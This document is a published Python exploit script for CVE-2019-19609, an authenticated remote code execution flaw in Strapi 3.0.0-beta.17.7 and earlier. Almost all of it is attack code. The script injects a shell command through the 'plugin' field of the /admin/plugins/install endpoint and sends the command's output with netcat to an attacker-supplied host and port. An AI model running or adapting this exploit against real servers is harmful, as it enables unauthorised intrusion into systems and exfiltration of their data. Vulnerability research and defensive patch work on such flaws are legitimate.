Strapi 3.0.0-beta.17.7 Remote Code Execution

`# Exploit Title: Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)  
# Date: 29/08/2021  
# Exploit Author: David Utón (M3n0sD0n4ld)  
# Vendor Homepage: https://strapi.io/  
# Affected Version: strapi-3.0.0-beta.17.7 and earlier  
# Tested on: Linux Ubuntu 18.04.5 LTS  
# CVE : CVE-2019-19609  
  
#!/usr/bin/python3  
# Author: @David_Uton (m3n0sd0n4ld)  
# Github: https://m3n0sd0n4ld.github.io  
# Usage: python3 CVE-2019-19609.py http[s]//IP[:PORT] TOKEN_JWT COMMAND LHOST  
  
import requests, sys, os, socket  
  
logoType = ('''  
=====================================  
CVE-2019-19609 - Strapi RCE  
-------------------------------------  
@David_Uton (M3n0sD0n4ld)  
https://m3n0sd0n4ld.github.io/  
=====================================  
''')  
  
if __name__ == '__main__':  
  
# Parameter checking  
if len(sys.argv) != 5:  
print(logoType)  
print("[!] Some of these parameters are missing.")  
print('''  
Use: python3 %s http[s]//IP[:PORT] TOKEN_JWT COMMAND LHOST  
Example: python3 10.10.10.10 eyJHbGCi..... "id" 127.0.0.1''' % sys.argv[0])  
# Exploit run  
else:  
# Paremeters  
url = sys.argv[1]  
token = sys.argv[2]  
command = sys.argv[3]  
lhost = sys.argv[4]  
lport = 9999  
  
s = requests.session()  
  
r = s.post(url, verify=False) # SSL == verify=True  
  
headersData = {  
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',  
'Authorization': "Bearer %s" % token  
}  
  
postData = {  
"plugin":"documentation && $(%s > /tmp/.m3 && nc %s %s < /tmp/.m3 | rm /tmp/.m3)" % (command, lhost, lport)  
}  
  
print(logoType)  
os.system("nc -nvlp 9999 &")  
try:  
print("[+] Successful operation!!!")  
r = s.post(url + "/admin/plugins/install", headers=headersData, data=postData, verify=False) # SSL == verify=True  
# Content print  
print(r.text)  
except:  
print("[!] An error occurred, try again.")  
sys.exit(1)  
  
`